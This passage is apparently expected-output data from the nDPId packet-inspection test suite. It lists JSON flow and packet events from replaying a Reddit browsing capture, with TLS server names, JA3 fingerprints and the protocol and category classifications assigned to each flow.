-00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3009,"source":"reddit.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1605291687975,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291687975,"pkt":"qtsDr8lk5EKm5WPyht1gA0MZACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAAAXNobxrOgBu0Y7yJEjS+XYgBAB+0YvAAABAQgKUckwIcLXQBU="} -00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3014,"source":"reddit.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291687934,"flow_last_seen":1605291687975,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687975,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::1736:86f1","src_port":44264,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"sb.scorecardresearch.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00970{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3016,"source":"reddit.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291687896,"flow_last_seen":1605291687976,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605291687976,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::2278:cf94","src_port":39626,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"id.rlcdn.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00988{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3105,"source":"reddit.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291687931,"flow_last_seen":1605291688024,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291688024,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54862,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.YouTube","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.youtube.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00992{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3113,"source":"reddit.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291687934,"flow_last_seen":1605291688025,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605291688025,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::1736:86f1","src_port":44264,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"sb.scorecardresearch.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01012{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3144,"source":"reddit.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291687933,"flow_last_seen":1605291688036,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605291688036,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2620:116:800d:21:f916:5049:f87f:108e","src_port":48648,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"secure.quantserve.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"b898351eb5e266aefd3723d466935494","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01390{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3147,"source":"reddit.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1605291687933,"flow_last_seen":1605291688036,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":3881,"flow_avg_l4_payload_len":485,"midstream":0,"thread_ts_msec":1605291688036,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2620:116:800d:21:f916:5049:f87f:108e","src_port":48648,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"secure.quantserve.com","server_names":"*.quantserve.com,*.quantcount.com,*.apextag.com,quantserve.com,quantcount.com,apextag.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"b898351eb5e266aefd3723d466935494","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Quantcast Corporation, CN=*.quantserve.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"3A:30:B1:4A:CE:62:AF:55:B1:89:FF:0C:CB:69:E3:80:CB:B0:91:90"}} 
-01013{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3171,"source":"reddit.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291687800,"flow_last_seen":1605291688046,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605291688046,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::68f4:2ac8","src_port":56782,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"syndication.twitter.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01459{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3174,"source":"reddit.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605291687800,"flow_last_seen":1605291688046,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":3956,"flow_avg_l4_payload_len":439,"midstream":0,"thread_ts_msec":1605291688046,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::68f4:2ac8","src_port":56782,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"syndication.twitter.com","server_names":"syndication.twitter.com,syndication.twimg.com,syndication-o.twitter.com,syndication-o.twimg.com,cdn.syndication.twitter.com,cdn.syndication.twimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Twitter, Inc., OU=lon3, CN=syndication.twitter.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"09:D3:FE:9A:3E:39:A7:E2:90:5B:C9:1F:3B:7D:CE:7C:7E:08:1C:6F"}} -00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3346,"source":"reddit.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291688324,"flow_last_seen":1605291688324,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291688324,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d1e6","src_port":51100,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3346,"source":"reddit.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1605291688324,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688324,"pkt":"qtsDr8lk5EKm5WPyht1gDP1bACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADYOtHmx5wBu0pXpjQAAAAAoAL9INe7AAACBAWgBAIICn8mSwwAAAAAAQMDBw=="} 
-00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3358,"source":"reddit.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291688336,"flow_last_seen":1605291688336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291688336,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d1e6","src_port":51102,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3358,"source":"reddit.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1605291688336,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688336,"pkt":"qtsDr8lk5EKm5WPyht1gC0OFACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADYOtHmx54BuzYIpzgAAAAAoAL9IOr4AAACBAWgBAIICn8mSxgAAAAAAQMDBw=="} -00628{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3372,"source":"reddit.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291688344,"flow_last_seen":1605291688344,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291688344,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2600:9000:219c:ee00:6:44e3:f8c0:93a1","src_port":56186,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3372,"source":"reddit.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1605291688344,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688344,"pkt":"qtsDr8lk5EKm5WPyht1gATUNACgGQCoBywEgSYsHmR3shSjf9ikmAJAAIZzuAAAGROP4wJOh23oBu4m0PmAAAAAAoAL9ICpwAAACBAWgBAIICgi3lpgAAAAAAQMDBw=="} -00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3437,"source":"reddit.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1605291688365,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688365,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAANg60eYqAcsBIEmLB5kd7IUo3\/YpAbvHnC63k25KV6Y1oBJXgLbhAAACBAV4AQMDAwQCCArC10GYfyZLDA=="} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3438,"source":"reddit.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":1605291688365,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291688365,"pkt":"qtsDr8lk5EKm5WPyht1gDP1bACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADYOtHmx5wBu0pXpjUut5NvgBAB+zrKAAABAQgKfyZLNcLXQZg="} 
-00958{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3439,"source":"reddit.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688324,"flow_last_seen":1605291688365,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291688365,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d1e6","src_port":51100,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ad.doubleclick.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3440,"source":"reddit.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1605291688370,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688370,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAANg60eYqAcsBIEmLB5kd7IUo3\/YpAbvHnlMkjxA2CKc5oBJXgKoEAAACBAV4AQMDAwQCCArC10GjfyZLGA=="} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3444,"source":"reddit.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":1605291688370,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291688370,"pkt":"qtsDr8lk5EKm5WPyht1gC0OFACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADYOtHmx54BuzYIpzlTJI8RgBAB+y30AAABAQgKfyZLOsLXQaM="} 
-00958{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3446,"source":"reddit.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688336,"flow_last_seen":1605291688371,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291688371,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d1e6","src_port":51102,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ad.doubleclick.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3449,"source":"reddit.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1605291688371,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688371,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSYAkAAhnO4AAAZE4\/jAk6EqAcsBIEmLB5kd7IUo3\/YpAbvbeuzTe9OJtD5hoBJXgGMHAAACBAV4AQMDAwQCCArC10GlCLeWmA=="} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3451,"source":"reddit.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1605291688371,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291688371,"pkt":"qtsDr8lk5EKm5WPyht1gATUNACAGQCoBywEgSYsHmR3shSjf9ikmAJAAIZzuAAAGROP4wJOh23oBu4m0PmHs03vUgBAB++b9AAABAQgKCLeWs8LXQaU="} 
-00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3453,"source":"reddit.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688344,"flow_last_seen":1605291688372,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291688372,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2600:9000:219c:ee00:6:44e3:f8c0:93a1","src_port":56186,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"rules.quantcount.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00999{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3517,"source":"reddit.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688324,"flow_last_seen":1605291688408,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605291688408,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d1e6","src_port":51100,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"ad.doubleclick.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00999{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3521,"source":"reddit.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688336,"flow_last_seen":1605291688408,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605291688408,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d1e6","src_port":51102,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"ad.doubleclick.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00996{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3538,"source":"reddit.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688344,"flow_last_seen":1605291688411,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291688411,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2600:9000:219c:ee00:6:44e3:f8c0:93a1","src_port":56186,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"rules.quantcount.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00626{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3906,"source":"reddit.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291688611,"flow_last_seen":1605291688611,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291688611,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:134:1a0d:1429:742:782:b6","src_port":39736,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3906,"source":"reddit.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1605291688611,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688611,"pkt":"qtsDr8lk5EKm5WPyht1gDEO\/ACgGQCoBywEgSYsHmR3shSjf9ikmBigAATQaDRQpB0IHggC2mzgBu\/F3Z44AAAAAoAL9IIe6AAACBAWgBAIICvY2BR4AAAAAAQMDBw=="} -00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3908,"source":"reddit.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1605291688654,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688654,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSYGKAABNBoNFCkHQgeCALYqAcsBIEmLB5kd7IUo3\/YpAbubOJS20cTxd2ePoBJXgMFkAAACBAV4AQMDAwQCCArC10K+9jYFHg=="} 
-00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3910,"source":"reddit.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1605291688654,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291688654,"pkt":"qtsDr8lk5EKm5WPyht1gDEO\/ACAGQCoBywEgSYsHmR3shSjf9ikmBigAATQaDRQpB0IHggC2mzgBu\/F3Z4+UttHFgBAB+0VLAAABAQgK9jYFScLXQr4="} -00975{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3911,"source":"reddit.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688611,"flow_last_seen":1605291688654,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291688654,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:134:1a0d:1429:742:782:b6","src_port":39736,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.syndication.twimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-01014{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3999,"source":"reddit.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688611,"flow_last_seen":1605291688705,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1605291688705,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:134:1a0d:1429:742:782:b6","src_port":39736,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"},"tls": 